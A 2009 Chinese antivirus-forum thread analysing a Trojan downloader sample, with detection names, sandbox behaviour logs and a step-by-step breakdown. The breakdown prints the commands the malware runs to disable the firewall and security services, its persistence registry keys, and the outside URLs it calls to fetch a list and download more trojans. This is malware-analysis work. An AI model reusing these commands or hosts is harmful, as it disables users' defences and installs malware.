贯穿于整个远景论坛长达几天之久的病毒样本

显示全部楼层 · 发表于 2009-9-2 10:39:59

您查询的IP:121.12.116.67
本站主数据：广东省东莞市电信IDC机房
参考数据一：广东省东莞市电信
参考数据二：广东省东莞市电信

显示全部楼层 · 发表于 2009-9-2 10:42:17

瑞星 Trojan.Win32.KillAV.bwg

显示全部楼层 · 发表于 2009-9-2 10:47:24

话说这个文件运行后是不是得等老长时间啊。。。。

我以外它休眠了，等了老长时间终于看到它又活动了

Win32 API 挂钩
VirtualProtect(alg.exe) from Z:\Temp\alg.exe

创建文件
C:\WINDOWS\system32\aa333234t.dll

未知进程启动
C:\WINDOWS\system32\aa333234t.dll

删除并重新创建文件
C:\WINDOWS\system32\drivers\asyncmac.sys

安装服务
RAS Asynchronous Media Driver

启动服务
RAS Asynchronous Media Driver

创建注册表项
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\*.*

删除并重新创建注册表项
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

创建并启动进程
C:\WINDOWS\aa673406.exe

设置注册表项值
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\360Soft

进程启动
C:\WINDOWS\system32\net1.exe

控制服务
Windows Firewall/Internet Connection Sharing (ICS)

删除服务及文件
pcidump

创建文件
C:\WINDOWS\system32\scvhost.exe

创建文件
C:\Documents and Settings\Administrator\Local Settings\Temp\_uok.bat

主要动作就是这些~

显示全部楼层 · 发表于 2009-9-2 10:57:59

瑞星2010
Trojan.Win32.KillAV.bwg

显示全部楼层 · 发表于 2009-9-2 11:18:08

规则好有意思。。。。

显示全部楼层 · 发表于 2009-9-2 11:54:19

汗，动作真多
http://www.threatexpert.com/repo ... 7c632532a72a17deae4

[ 本帖最后由 jason_jiang 于 2009-9-2 12:11 编辑 ]

显示全部楼层 · 发表于 2009-9-2 12:09:25

无法返回请求的网页

试图访问的网页：

http://bbs.kafan.cn/attachment.php?aid=
615628&k=1dc941ba6c255aa07337830ebffbae9
d&t=1251864529

被以下病毒感染：Trojan-Downloader.Win32.Geral.cua

显示全部楼层 · 发表于 2009-9-2 13:03:50

一个已经出来了很长时间的downloader，这一变种貌似功能有所减少

alg.exe
1.释放a%s%dt.dll(随机文件名)至%windir%\system32目录下
2.调用rundll32.dll加载a%s%dt.dll
3.释放a%s%d.exe(随机文件名)至%windir%目录下并运行
4.释放pcidump.sys至%windir%\system32\drivers目录下并加载之
5.复制自身至%windir%\system32\scvhost.exe
6.设置启动项值[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]360Soft = "%System%\scvhost.exe"

a%s%dt.dll
1.释放AsyncMac.sys,aec.sys 至%windir%\system32\drivers目录下并加载之
2.重定向劫持杀毒软件程序(18楼已列举)
3.调用cmd /c sc config停止瑞星,kav,nod32,金山等杀毒软件服务
4.调用taskkill关闭kav,金山,nod32等杀毒软件进程
5.清空SOFTWARE\Microsoft\Windows\CurrentVersion\Run项

a%s%d.exe
1.调用cmd
cmd /c cacls "%s" /e /p everyone:f
cmd /c net stop wscsvc
cmd /c net stop SharedAccess
cmd /c sc config sharedaccess start= disabled
2.从http://5662218896.9966.org/net/count.asp?mac=001190a830d1&ver=2009-9-1zr&os=&dtime=2009-9-1获取列表url=http://554313.3322.org/net.txt

1:http://5435646.2288.org/xx1.exe
1:http://5435646.2288.org/xx2.exe
1:http://5435646.2288.org/xx3.exe
1:http://5435646.2288.org/xx4.exe
1:http://5435646.2288.org/xx5.exe
1:http://5435646.2288.org/xx6.exe
1:http://5435646.2288.org/xx7.exe
1:http://5435646.2288.org/xx8.exe
1:http://5435646.2288.org/xx9.exe
1:http://5435646.2288.org/xx10.exe
1:http://5435646.2288.org/xx11.exe
1:http://5435646.2288.org/xx12.exe
1:http://5435646.2288.org/xx13.exe
1:http://5435646.2288.org/xx14.exe
1:http://5435646.2288.org/xx15.exe
1:http://5435646.2288.org/xx16.exe
1:http://5435646.2288.org/xx17.exe
1:http://5435646.2288.org/xx18.exe
1:http://5435646.2288.org/xx19.exe
1:http://5435646.2288.org/xx20.exe
1:http://5435646.2288.org/xx22.exe
1:http://5435646.2288.org/xx24.exe
1:http://5435646.2288.org/xx25.exe

3.下载木马群并运行之

对于驱动本人能力不足，只能参考下，有些驱动加载了后来又卸载了
AsyncMac.sys
用来killav的驱动
aec.sys
恢复ssdt的驱动
pcidump.sys
穿还原

显示全部楼层 · 发表于 2009-9-2 14:53:02

Starting the file scan:

Begin scan in 'D:\DOWNLOADS\alg.rar'
D:\DOWNLOADS\alg.rar
  [0] Archive type: RAR
--> alg.exe
   [DETECTION] Contains a recognition pattern of the (harmful) BDS/Backdoor.Gen back-door program

Beginning disinfection:
D:\DOWNLOADS\alg.rar
[NOTE]    The file was moved to '4b05162a.qua'!

显示全部楼层 · 发表于 2009-9-2 15:56:09

飞塔MISS。

[病毒样本] 贯穿于整个远景论坛长达几天之久的病毒样本

回复 11楼 lorchid 的帖子